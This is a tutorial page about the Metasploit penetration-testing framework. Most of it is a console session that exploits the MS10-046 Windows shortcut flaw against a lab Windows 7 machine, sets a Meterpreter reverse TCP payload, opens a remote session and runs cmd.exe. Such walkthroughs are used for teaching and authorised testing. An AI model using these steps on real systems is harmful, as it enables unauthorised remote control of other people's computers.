metasploit community / pro

Description

metasploit community / pro The Metasploit Framework, MSF is a framework, a collection of programs and tools for penetration testing networks. Metasploit has a collection of exploits, payloads, libraries and interfaces that can be used to exploit computers.

Metasploit has a large collection of exploits and payloads and the tools to package and deliver them to a targeted host computer. Metasploit allows you to choose an exploit from its library, choose a payload, configure the target addressing, the target port numbers, and other options, and the framework will package it all together together, and launch it across the network to a targeted system. Metasploit is extremely flexible and can assist in the testing and development of exploits. Written in the Ruby programming language, Metasploit also allows the user to write his own exploits and payloads and include them within the framework. Metasploit is cross platform and can run on Linux, MAC OS, and Windows and has exploits and payloads targeting all three as well.

Meterpreter – One of the more powerful payloads is the Metasploit Interpreter or Meterpreter. Meterpreter allows the user to have command line access to the targeted machine without running a cmd.exe process, it runs completely in memory through the exploited process.

Example

Reverse Connection From target running on Windows 7 :

cyborg@cyborg:~$ sudo msfpro
[sudo] password for cyborg: 
[*] Starting Metasploit Console...

 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


Love leveraging credentials? Check out bruteforcing
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]
+ -- --=[ 1339 exploits - 809 auxiliary - 228 post        ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Successfully loaded plugin: pro
msf > show exploits

Exploits
========

   Name                                                           Disclosure Date  Rank       Description
   ----                                                           ---------------  ----       -----------
   aix/local/ibstat_path                                          2013-09-24       excellent  ibstat $PATH Privilege Escalation
   aix/rpc_cmsd_opcode21                                          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   aix/rpc_ttdbserverd_realpath                                   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   android/browser/webview_addjavascriptinterface                 2012-12-21       normal     Android Browser and WebView addJavascriptInterface Code Execution
   android/fileformat/adobe_reader_pdf_js_interface               2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   apple_ios/browser/safari_libtiff                               2006-08-01       good       Apple iOS MobileSafari LibTIFF Buffer Overflow
   apple_ios/email/mobilemail_libtiff                             2006-08-01       good       Apple iOS MobileMail LibTIFF Buffer Overflow
   apple_ios/ssh/cydia_default_ssh                                2007-07-02       excellent  Apple iOS Default SSH Password Vulnerability
   bsdi/softcart/mercantec_softcart                               2004-08-19       great      Mercantec SoftCart CGI Overflow
   dialup/multi/login/manyargs                                    2001-12-12       good       System V Derived /bin/login Extraneous Arguments Buffer Overflow
   firefox/local/exec_shellcode                                   2014-03-10       normal     Firefox Exec Shellcode from Privileged Javascript Shell
   freebsd/ftp/proftp_telnet_iac                                  2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   freebsd/local/mmap                                             2013-06-18       great      FreeBSD 9 Address Space Manipulation Privilege Escalation
   freebsd/samba/trans2open                                       2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   freebsd/tacacs/xtacacsd_report                                 2008-01-08       average    XTACACSD report() Buffer Overflow
   freebsd/telnet/telnet_encrypt_keyid                            2011-12-23       great      FreeBSD Telnet Service Encryption Key ID Buffer 
.............
msf > use windows/browser/ms10_046_shortcut_icon_dllloader


msf exploit(ms10_046_shortcut_icon_dllloader) > show payloads

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/custom                                                    normal  Custom Payload
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective DLL Injection, Bind TCP Stager
   windows/dllinject/bind_tcp_rc4                                    normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_hop_http                                normal  Reflective DLL Injection, Reverse Hop HTTP Stager
   windows/dllinject/reverse_http                                    normal  Reflective DLL Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dllinject/reverse_tcp_rc4                                 normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_tcp_rc4_dns                             normal  Reflective DLL Injection, Reverse TCP Stage

..................................
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > show options

Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
   URIPATH  /                yes       The URI to use (do not change).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.1.10     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.10
SRVHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.10:4444 
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Send vulnerable clients to \\192.168.1.10\nlyZM\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*] Using URL: http://192.168.1.10:80/
[*] Server started.
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 404 for /nlyZM/dEgPpgDCjZL.dll.2.Manifest ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] Sending stage (769536 bytes) to 192.168.1.40
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/dEgPpgDCjZL.dll
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending DLL multistatus for /nlyZM/dEgPpgDCjZL.dll ...
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.40:52843) at 2015-10-09 16:42:57 +0530

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > execute -f cmd.exe -i -H
Process 4036 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::310c:8439:5772:51c8%11
   IPv4 Address. . . . . . . . . . . : 192.168.1.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::226:15ff:fe67:e6c3%11
                                       192.168.1.1
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?